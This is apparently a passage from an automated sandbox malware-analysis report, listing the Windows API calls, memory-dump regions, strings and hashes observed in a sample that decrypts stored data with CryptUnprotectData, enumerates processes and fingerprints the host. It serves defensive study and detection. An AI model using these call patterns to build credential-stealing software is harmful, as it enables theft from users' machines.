                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00402DEC
                                  • LocalFree.KERNEL32(00000000), ref: 00402FCA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: f41176629e42fad741279f84e911c6a5a3f99d7dc0d2f69678eb3334c3b0f33d
                                  • Instruction ID: 477d6e3ad603a3a45fa101c2fbc84d86889fd40af51783668a5b3157b83551c4
                                  • Opcode Fuzzy Hash: f41176629e42fad741279f84e911c6a5a3f99d7dc0d2f69678eb3334c3b0f33d
                                  • Instruction Fuzzy Hash: 0CB1F970900215CFD715CF14C948B96B7F6BB44319F29C1BAD408AB3E6D7BA9D82CB94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 97$*:~$E"uo$[y?o$\vz$l:z$+s^
                                  • API String ID: 0-3902775800
                                  • Opcode ID: 7d95c5301378dc03be0597a0bcda4adab465089e41d57c64d3a7d1c1b106cf9e
                                  • Instruction ID: 0be1d6a4cd3a7e7605209d536ca7a9b11a323b32ad448c2da9ed581058cfe30c
                                  • Opcode Fuzzy Hash: 7d95c5301378dc03be0597a0bcda4adab465089e41d57c64d3a7d1c1b106cf9e
                                  • Instruction Fuzzy Hash: 44A2E7F360C2149FE304AE2DEC8567AF7E9EF94720F16893DEAC4C3744E63598058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !B;g$1o3$4:!$5v}$R=$_W~.
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7n$B{$7h;$:1/$Q/U:$cw
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00402C42
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402C49
                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00402C58
                                  • wsprintfA.USER32 ref: 00402C83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 003E775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 003E7765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 003E778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 003E77AD
                                  • LocalFree.KERNEL32(?), ref: 003E77B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "+_$?oiY$jij_$vb|
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 6;$Wkl$w"v$7q
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: '~J]$LKn;$RxK|$j-V.
                                  APIs
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00403A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 00403AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00403ABF
                                    • Part of subcall function 00407310: lstrlen.KERNEL32(------,003E5BEB), ref: 0040731B
                                    • Part of subcall function 00407310: lstrcpy.KERNEL32(00000000), ref: 0040733F
                                    • Part of subcall function 00407310: lstrcat.KERNEL32(?,------), ref: 00407349
                                    • Part of subcall function 00407280: lstrcpy.KERNEL32(00000000), ref: 004072AE
                                  • CloseHandle.KERNEL32(00000000), ref: 00403BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 003EEA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 003EEA7E
                                  • lstrcat.KERNEL32(0040CFEC,0040CFEC), ref: 003EEB27
                                  • lstrcat.KERNEL32(0040CFEC,0040CFEC), ref: 003EEB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 3d98be170f3061074731374c397c48aab5cab8057fc0d28ae15a8c62420c525d
                                  • Instruction ID: f226faa6b9b499eda887e960a3e4d43478c9c560f35e3bea98b566d79fe49d52
                                  • Opcode Fuzzy Hash: 3d98be170f3061074731374c397c48aab5cab8057fc0d28ae15a8c62420c525d
                                  • Instruction Fuzzy Hash: 4731E775A04119EBDB109B59EC45FEEB77EDF44705F04817AF909E3280DBB05A048BA6
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004040CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004040DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 004040E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00404113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: cfe8ad0aa625ea09d06c9065544898ac9dc1005552a7d5f48e872b44fe995620
                                  • Instruction ID: 58ac40f8a32d4a8fca112bcaf703e68b868c39b01694f059a12272c4b51ac3c0
                                  • Opcode Fuzzy Hash: cfe8ad0aa625ea09d06c9065544898ac9dc1005552a7d5f48e872b44fe995620
                                  • Instruction Fuzzy Hash: AF011EB0600205ABDB109FA5EC55BAB7BAEEF89311F14816ABE0997340DA719950CBA4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0040A3D0,000000FF), ref: 00402B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00402B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,0040A3D0,000000FF), ref: 00402BA2
                                  • wsprintfA.USER32 ref: 00402BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: ca5d196100c96d5c7bf308dfe0184afdff42e27a541758f14cc62c7e10658d16
                                  • Instruction ID: a71e76086396b1bf825172790a3b8df341ac9e5c85be60468cc8bdce33e3246f
                                  • Opcode Fuzzy Hash: ca5d196100c96d5c7bf308dfe0184afdff42e27a541758f14cc62c7e10658d16
                                  • Instruction Fuzzy Hash: 0E0140B2904128ABCB149BD9DD45FFEB7BDFB4CB12F04411AFA05A2290E7785940C7B5
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003E9B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 003E9B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003E9B61
                                  • LocalFree.KERNEL32 ref: 003E9B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: fd7ae2494bc5dc4db049f432e123f6728595ecf4d2de84dd7d8347b229951cfc
                                  • Instruction ID: 4bbb4ef094bb9953356b1f2d4a45f103355f7642c0df305afb600c6d4c412e53
                                  • Opcode Fuzzy Hash: fd7ae2494bc5dc4db049f432e123f6728595ecf4d2de84dd7d8347b229951cfc
                                  • Instruction Fuzzy Hash: 3DF01DB03403226BF7315F65AC5AF967BA9EF08B51F250215FA45EA2D0D7B09880CBA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: #${R$KIYA$U5$y ;c
                                  • API String ID: 0-3460542495
                                  • Opcode ID: 33a816737cd92e942a0e38428585bf8bc68f2593a15858341f4e1fddb14356af
                                  • Instruction ID: 238c6f391c6dcc4a2fd5a0d07983f11482eb47e8f0d3d8f9096e44dd93cf0696
                                  • Opcode Fuzzy Hash: 33a816737cd92e942a0e38428585bf8bc68f2593a15858341f4e1fddb14356af
                                  • Instruction Fuzzy Hash: 843207F3A08204AFD3046E2DEC8576ABBE5EF94720F1A493DE6C4C7744EA3598058797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 8w_$r.w$ylwB
                                  • API String ID: 0-974849845
                                  • Opcode ID: 251ab71ff8c5087d789cb3c5d21e6b88d10437d4f95f4b92e6916e5b54f779a7
                                  • Instruction ID: a8497ad8733bc06a2f9337c9c3d69925e30f93434cf64d155830a502212ea56b
                                  • Opcode Fuzzy Hash: 251ab71ff8c5087d789cb3c5d21e6b88d10437d4f95f4b92e6916e5b54f779a7
                                  • Instruction Fuzzy Hash: 6EB217F3A082049FE3046E2DEC8567AFBE9EF94320F1A493DEAC4C7744E63558158697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C0T$QFfs$`!kz
                                  • API String ID: 0-1492128711
                                  • Opcode ID: 992278d85eac75f1a09d1f9bb44e220c9976bdd4fbc124bace23932a18943fb6
                                  • Instruction ID: 01c073846c925708e3361d7d7918145d9e290a16aa767d16162c635b8ec25a22
                                  • Opcode Fuzzy Hash: 992278d85eac75f1a09d1f9bb44e220c9976bdd4fbc124bace23932a18943fb6
                                  • Instruction Fuzzy Hash: 5BB2E6F360C2009FE3046E2DEC85A7ABBE5EF94720F164A3DEAC5C7744E63598058697
                                  APIs
                                  • CoCreateInstance.COMBASE(0040B110,00000000,00000001,0040B100,?), ref: 003FCB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003FCB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 003FCBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  • Opcode ID: b667aa1bb7b1529af6577ccda83327fbeda6fa66252700b875deda3412c0b432
                                  • Instruction ID: 203e9e131b8020c6141e1984f35f25e85986e96a80dfdb2fd45168598d323636
                                  • Opcode Fuzzy Hash: b667aa1bb7b1529af6577ccda83327fbeda6fa66252700b875deda3412c0b432
                                  • Instruction Fuzzy Hash: 5A317575A40619BFD710DB94CC92FAAB7B9DB88B11F104194FB04EB2D0D7B0AE45CBA0
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003E9B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003E9BB3
                                  • LocalFree.KERNEL32(?), ref: 003E9BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
